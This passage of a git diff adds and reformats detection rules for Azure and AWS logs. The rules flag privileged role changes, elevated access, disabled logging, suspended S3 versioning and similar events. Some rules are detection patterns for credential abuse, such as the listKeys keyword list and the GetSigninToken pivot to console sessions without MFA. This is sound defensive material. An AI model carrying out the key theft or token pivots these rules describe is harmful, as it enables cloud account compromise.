'@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'noMfaOnRoleActivationAlertIncident' + condition: selection +falsepositives: + - Investigate if user is performing MFA at sign-in. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_not_used.yml b/src/main/resources/rules/azure/azure_pim_role_not_used.yml new file mode 100644 index 000000000..cc1cd00d1 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_not_used.yml @@ -0,0 +1,22 @@ +title: Roles Are Not Being Used +id: 8c6ec464-4ae4-43ac-936a-291da66ed13d +status: experimental +description: Identifies when a user has been assigned a privilege role and are not using that role. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'redundantAssignmentAlertIncident' + condition: selection +falsepositives: + - Investigate if potential generic account that cannot be removed. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml b/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml new file mode 100644 index 000000000..dd24c9ab2 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml @@ -0,0 +1,22 @@ +title: Too Many Global Admins +id: 7bbc309f-e2b1-4eb1-8369-131a367d67d3 +status: experimental +description: Identifies an event where there are there are too many accounts assigned the Global Administrator role. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident' + condition: selection +falsepositives: + - Investigate if threshold setting in PIM is too low. +level: high diff --git a/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml b/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml new file mode 100644 index 000000000..780beedfb --- /dev/null +++ b/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml @@ -0,0 +1,24 @@ +title: User Added To Privilege Role +id: 49a268a4-72f4-4e38-8a7b-885be690c5b5 +status: test +description: Detects when a user is added to a privileged role. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/06 +tags: + - attack.privilege_escalation + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Add eligible member (permanent) + - Add eligible member (eligible) + condition: selection +falsepositives: + - Legtimate administrator actions of adding members from a role +level: high diff --git a/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml b/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml new file mode 100644 index 000000000..8665f1ebc --- /dev/null +++ b/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml @@ -0,0 +1,23 @@ +title: Bulk Deletion Changes To Privileged Account Permissions +id: 102e11e3-2db5-4c9e-bc26-357d42585d21 +status: test +description: Detects when a user is removed from a privileged role. Bulk changes should be investigated. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/05 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Remove eligible member (permanent) + - Remove eligible member (eligible) + condition: selection +falsepositives: + - Legtimate administrator actions of removing members from a role +level: high diff --git a/src/main/resources/rules/azure/azure_privileged_account_creation.yml b/src/main/resources/rules/azure/azure_privileged_account_creation.yml new file mode 100644 index 000000000..7dae3cfd0 --- /dev/null +++ b/src/main/resources/rules/azure/azure_privileged_account_creation.yml @@ -0,0 +1,26 @@ +title: Privileged Account Creation +id: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947 +status: test +description: Detects when a new admin is created. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton +date: 2022/08/11 +modified: 2022/08/16 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message|contains|all: + - Add user + - Add member to role + Status: Success + condition: selection +falsepositives: + - A legitimate new admin account being created +level: medium diff --git a/src/main/resources/rules/azure/azure_rare_operations.yml b/src/main/resources/rules/azure/azure_rare_operations.yml index 169ae1b53..f7776cf79 100644 --- a/src/main/resources/rules/azure/azure_rare_operations.yml +++ b/src/main/resources/rules/azure/azure_rare_operations.yml @@ -2,26 +2,26 @@ title: Rare Subscription-level Operations In Azure id: c1182e02-49a3-481c-b3de-0fadc4091488 status: test description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/RareOperations.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.t1003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.DocumentDB/databaseAccounts/listKeys/action - - Microsoft.Maps/accounts/listKeys/action - - Microsoft.Media/mediaservices/listKeys/action - - Microsoft.CognitiveServices/accounts/listKeys/action - - Microsoft.Storage/storageAccounts/listKeys/action - - Microsoft.Compute/snapshots/write - - Microsoft.Network/networkSecurityGroups/write - condition: keywords + keywords: + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1003 diff --git a/src/main/resources/rules/azure/azure_service_principal_created.yml b/src/main/resources/rules/azure/azure_service_principal_created.yml index 46a14b711..c0133ca46 100644 --- a/src/main/resources/rules/azure/azure_service_principal_created.yml +++ b/src/main/resources/rules/azure/azure_service_principal_created.yml @@ -1,22 +1,23 @@ title: Azure Service Principal Created id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +status: test description: Identifies when a service principal is created in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/02 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/02 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: 'Add service principal' condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Service principal being created may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_service_principal_removed.yml b/src/main/resources/rules/azure/azure_service_principal_removed.yml index 43328012b..9fb6f81f0 100644 --- a/src/main/resources/rules/azure/azure_service_principal_removed.yml +++ b/src/main/resources/rules/azure/azure_service_principal_removed.yml @@ -1,22 +1,23 @@ title: Azure Service Principal Removed id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +status: test description: Identifies when a service principal was removed in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: Remove service principal condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Service principal being removed may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml index 37c184fd9..3ec76e2dd 100644 --- a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml +++ b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml @@ -1,21 +1,25 @@ title: Azure Subscription Permission Elevation Via ActivityLogs id: 09438caa-07b1-4870-8405-1dbafe3dad95 -status: experimental +status: test +description: | + Detects when a user has been elevated to manage all Azure Subscriptions. + This change should be investigated immediately if it isn't planned. + This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization author: Austin Songer @austinsonger date: 2021/11/26 -description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization +modified: 2022/08/23 +tags: + - attack.initial_access + - attack.t1078.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: - selection1: - properties.message: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION - condition: selection1 -level: high + selection: + operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION + condition: selection falsepositives: - - If this was approved by System Administrator. -tags: - - attack.initial_access - - attack.t1078 + - If this was approved by System Administrator. +level: high diff --git a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml index a566a107b..d8cb0ec13 100644 --- a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml +++ b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml @@ -1,22 +1,26 @@ title: Azure Subscription Permission Elevation Via AuditLogs id: ca9bf243-465e-494a-9e54-bf9fc239057d -status: experimental +status: test +description: | + Detects when a user has been elevated to manage all Azure Subscriptions. + This change should be investigated immediately if it isn't planned. + This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation author: Austin Songer @austinsonger date: 2021/11/26 -description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation +modified: 2022/12/25 +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - Category: 'Administrative' - OperationName: 'Assigns the caller to user access admin' - condition: selection -level: high + selection: + Category: 'Administrative' + OperationName: 'Assigns the caller to user access admin' + condition: selection falsepositives: - - If this was approved by System Administrator. -tags: - - attack.initial_access - - attack.t1078 + - If this was approved by System Administrator. +level: high diff --git a/src/main/resources/rules/azure/azure_suppression_rule_created.yml b/src/main/resources/rules/azure/azure_suppression_rule_created.yml index 7c079c960..437a5ef5b 100644 --- a/src/main/resources/rules/azure/azure_suppression_rule_created.yml +++ b/src/main/resources/rules/azure/azure_suppression_rule_created.yml @@ -1,22 +1,23 @@ title: Azure Suppression Rule Created id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +status: test description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Suppression Rule being created may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_tap_added.yml b/src/main/resources/rules/azure/azure_tap_added.yml new file mode 100644 index 000000000..726f36e60 --- /dev/null +++ b/src/main/resources/rules/azure/azure_tap_added.yml @@ -0,0 +1,22 @@ +title: Temporary Access Pass Added To An Account +id: fa84aaf5-8142-43cd-9ec2-78cfebf878ce +status: test +description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/10 +tags: + - attack.persistence + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Admin registered security info + Status: Admin registered temporary access pass method for user + condition: selection +falsepositives: + - Administrator adding a legitimate temporary access pass +level: high diff --git a/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml b/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml index 18691dfd3..5043451b2 100644 --- a/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml +++ b/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml @@ -1,28 +1,29 @@ title: Azure Unusual Authentication Interruption id: 8366030e-7216-476b-9927-271d79f13cf3 -status: experimental -author: Austin Songer @austinsonger -date: 2021/11/26 +status: test description: Detects when there is a interruption in the authentication process. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Austin Songer @austinsonger +date: 2021/11/26 +modified: 2022/12/18 +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection1: - ResultType: 50097 - ResultDescription: 'Device authentication is required' - selection2: - ResultType: 50155 - ResultDescription: 'DeviceAuthenticationFailed' - selection3: - ResultType: 50158 - ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' - condition: selection1 or selection2 or selection3 -level: medium + selection_50097: + ResultType: 50097 + ResultDescription: 'Device authentication is required' + selection_50155: + ResultType: 50155 + ResultDescription: 'DeviceAuthenticationFailed' + selection_50158: + ResultType: 50158 + ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' + condition: 1 of selection_* falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml b/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml index 5c087a6ee..059d1abe3 100644 --- a/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml +++ b/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml @@ -1,21 +1,26 @@ title: User Access Blocked by Azure Conditional Access id: 9a60e676-26ac-44c3-814b-0c2a8b977adf -status: experimental +status: test +description: | + Detect access has been blocked by Conditional Access policies. + The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts author: AlertIQ date: 2021/10/10 -description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.initial_access + - attack.t1110 + - attack.t1078.004 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 53003 - condition: selection -level: medium + selection: + ResultType: 53003 + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access - - attack.t1110 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_user_password_change.yml b/src/main/resources/rules/azure/azure_user_password_change.yml new file mode 100644 index 000000000..650434073 --- /dev/null +++ b/src/main/resources/rules/azure/azure_user_password_change.yml @@ -0,0 +1,27 @@ +title: Password Reset By User Account +id: 340ee172-4b67-4fb4-832f-f961bdc1f3aa +status: test +description: Detect when a user has reset their password in Azure AD +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: YochanaHenderson, '@Yochana-H' +date: 2022/08/03 +tags: + - attack.persistence + - attack.credential_access + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'UserManagement' + Status: 'Success' + Initiatedby: 'UPN' + filter: + Target|contains: 'UPN' + ActivityType|contains: 'Password reset' + condition: selection and filter +falsepositives: + - If this was approved by System Administrator or confirmed user action. +level: medium diff --git a/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml b/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml new file mode 100644 index 000000000..8dcb1141d --- /dev/null +++ b/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml @@ -0,0 +1,24 @@ +title: Users Authenticating To Other Azure AD Tenants +id: 5f521e4b-0105-4b72-845b-2198a54487b9 +status: test +description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins +author: MikeDuddington, '@dudders1' +date: 2022/06/30 +tags: + - attack.initial_access + - attack.t1078.004 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + HomeTenantId: 'HomeTenantID' + filter: + ResourceTenantId|contains: 'HomeTenantID' + condition: selection and not filter +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml index 6b25808c8..fd8667d23 100644 --- a/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml @@ -1,26 +1,27 @@ title: Azure Virtual Network Modified or Deleted id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f +status: test description: Identifies when a Virtual Network is modified or deleted in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message|startswith: + operationName|startswith: - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ - MICROSOFT.NETWORK/VIRTUALNETWORKS/ - properties.message|endswith: + operationName|endswith: - /WRITE - /DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml index 58d96b14e..9022ff228 100644 --- a/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml @@ -1,23 +1,24 @@ title: Azure VPN Connection Modified or Deleted id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 +status: test description: Identifies when a VPN connection is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml b/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml index 298585fae..783dceb32 100644 --- a/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml +++ b/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml @@ -1,22 +1,25 @@ title: AWS Attached Malicious Lambda Layer id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d -description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. -author: Austin Songer -status: experimental -date: 2021/09/23 +status: test +description: | + Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. + This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. references: - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +author: Austin Songer +date: 2021/09/23 +modified: 2022/10/09 +tags: + - attack.privilege_escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: lambda.amazonaws.com - eventName|startswith: UpdateFunctionConfiguration + eventName|startswith: 'UpdateFunctionConfiguration' condition: selection -level: medium -tags: - - attack.privilege_escalation falsepositives: - - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml b/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml index 965007fc9..eeae3dc7a 100644 --- a/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml +++ b/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml @@ -1,12 +1,15 @@ title: AWS CloudTrail Important Change id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 -status: experimental +status: test description: Detects disabling, deleting and updating of a Trail -author: vitaliy0x1 -date: 2020/01/21 -modified: 2021/08/09 references: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html +author: vitaliy0x1 +date: 2020/01/21 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail @@ -21,6 +24,3 @@ detection: falsepositives: - Valid change in a Trail level: medium -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml b/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml index 6a0d9e6a3..ea3d2e7b3 100644 --- a/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml +++ b/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml @@ -1,23 +1,25 @@ title: AWS Config Disabling Channel/Recorder id: 07330162-dba1-4746-8121-a9647d49d297 -status: experimental +status: test description: Detects AWS Config Service disabling +references: + - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html author: vitaliy0x1 date: 2020/01/21 -modified: 2021/08/09 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail detection: - selection_source: - eventSource: config.amazonaws.com + selection: + eventSource: 'config.amazonaws.com' eventName: - - DeleteDeliveryChannel - - StopConfigurationRecorder - condition: selection_source + - 'DeleteDeliveryChannel' + - 'StopConfigurationRecorder' + condition: selection falsepositives: - Valid change in AWS Config Service level: high -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml b/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml new file mode 100644 index 000000000..8e70b1e85 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml @@ -0,0 +1,28 @@ +title: AWS Console GetSigninToken Potential Abuse +id: f8103686-e3e8-46f3-be72-65f7fcb4aa53 +status: experimental +description: | + Detects potentially suspicious events involving "GetSigninToken". + An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. +references: + - https://github.com/NetSPI/aws_consoler + - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ +author: Chester Le Bron (@123Le_Bron) +date: 2024/02/26 +tags: + - attack.lateral_movement + - attack.t1021.007 + - attack.t1550.001 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'signin.amazonaws.com' + eventName: 'GetSigninToken' + filter_main_console_ua: + userAgent|contains: 'Jersey/${project.version}' + condition: selection and not 1 of filter_main_* +falsepositives: + - GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_delete_identity.yml b/src/main/resources/rules/cloudtrail/aws_delete_identity.yml new file mode 100644 index 000000000..c52d5975b --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_delete_identity.yml @@ -0,0 +1,23 @@ +title: SES Identity Has Been Deleted +id: 20f754db-d025-4a8f-9d74-e0037e999a9a +status: test +description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities +references: + - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ +author: Janantha Marasinghe +date: 2022/12/13 +modified: 2022/12/28 +tags: + - attack.defense_evasion + - attack.t1070 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'ses.amazonaws.com' + eventName: 'DeleteIdentity' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml b/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml new file mode 100644 index 000000000..e3694277b --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml @@ -0,0 +1,23 @@ +title: AWS S3 Bucket Versioning Disable +id: a136ac98-b2bc-4189-a14d-f0d0388e57a7 +status: experimental +description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. +references: + - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 +author: Sean Johnstone | Unit 42 +date: 2023/10/28 +tags: + - attack.impact + - attack.t1490 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: s3.amazonaws.com + eventName: PutBucketVersioning + requestParameters|contains: 'Suspended' + condition: selection +falsepositives: + - AWS administrator legitimately disabling bucket versioning +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml b/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml index cafbe45b6..ff2d9cd14 100644 --- a/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml @@ -1,12 +1,14 @@ title: AWS EC2 Disable EBS Encryption id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 status: stable -description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. +description: | + Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the 